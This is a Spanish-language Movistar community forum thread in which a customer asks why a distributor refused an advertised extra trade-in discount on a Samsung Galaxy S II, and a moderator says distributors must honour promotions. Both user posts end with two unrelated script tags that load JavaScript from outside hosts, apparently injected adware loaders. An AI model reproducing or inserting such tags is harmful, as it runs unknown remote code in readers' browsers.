TASACION EXTRA AL RENOVAR SAMSUNG

javibl
Yo probé el VDSL
TASACION EXTRA AL RENOVAR SAMSUNG

Hola a todos, agradecería mucho a algun moderador me pudiera explicar lo siguiente:

 

Estoy a la espera de recibir bono para recoger un Samsung Galaxy S II ofertado por retenciones al cancelar portabilidad y esta mañana he llamado a un distribuidor oficial de mi localidad, donde efectuan el programa "renueva y recicla" para que me confirmaran la tasación de mi antiguo movil (galaxy Ace).

 

Me dice la dependienta que si entrego mi antiguo movil operativo, me descontarian 68 € euros de la factura de compra, a lo que le pregunto sobre la informacion que aparece en la pagina 22 de la revista oficial de Movistar del mes de octubre, que dice literalmente " traenos tu viejo samsung durante este mes y te aplicaremos descuentos adicionales a la tasación" en mi caso 30€ mas por adquirir el SGS II, pero cual es mi sorpresa cuando me dice que de eso nada de nada.

 

Buscando en la Web me he encontrado con casos similares, y mi pregunta es la siguiente:

 

¿Los distribuidores oficiales de Movistar no deben ceñirse a las promociones que ofrece la compañia?

¿Acaso tienen ellos potestad para elegir que promos aplicar y cuales no, asi sin mas?

 

Lo vengo a decir porque he llamado a otras tiendas de poblaciones cercanas y el descuento extra si me lo aplican sin problemas, con el inconveniente de tener que desplazarme para conseguir mi terminal beneficiandome de esta promocion.

 

Espero vuestra respuesta agradeciendolo mucho de antemano.

Un saludo

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Mensaje 1 de 4
760 Visitas
3 RESPUESTAS 3
Gladiss-movistar
Antiguo Moderador

 

 

       Hola, @javibl!Emoticono feliz

 

Efectivamente como tu mismo indicas, todos los distribuidores están obligados a aplicar las promociones vigentes, por lo tanto si el distribuidor  de tu localidad, te dice que no, tienes que poner directamente la reclamación en la tienda, recuerda que tienen a disposición de los usuarios, las hojas de reclamaciones. Nosotros directamente no podemos hacer nada...  sentimos no poder ayudarte con este caso....Emoticono triste

 

Recuerda que seguimos aquí, para echarte una mano en todo lo posible.

 

       Salu2Guiño

 


Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 2 de 4
735 Visitas
javibl
Yo probé el VDSL

Muchas gracias por tu respuesta Gladiss, voy a poner la reclamación, pero me parece que ya me puedo olvidar de la promocion en esta tienda.

 

Un saludo.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Mensaje 3 de 4
727 Visitas
Gladiss-movistar
Antiguo Moderador

 

 

      Hola, @javibl!Emoticono feliz

 

Muchas gracias a ti por tu comentario y  por participar en la comunidad!!Emoticono muy feliz

 

       Salu2Guiño



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook y Google+


Solución aceptada.png
Mensaje 4 de 4
709 Visitas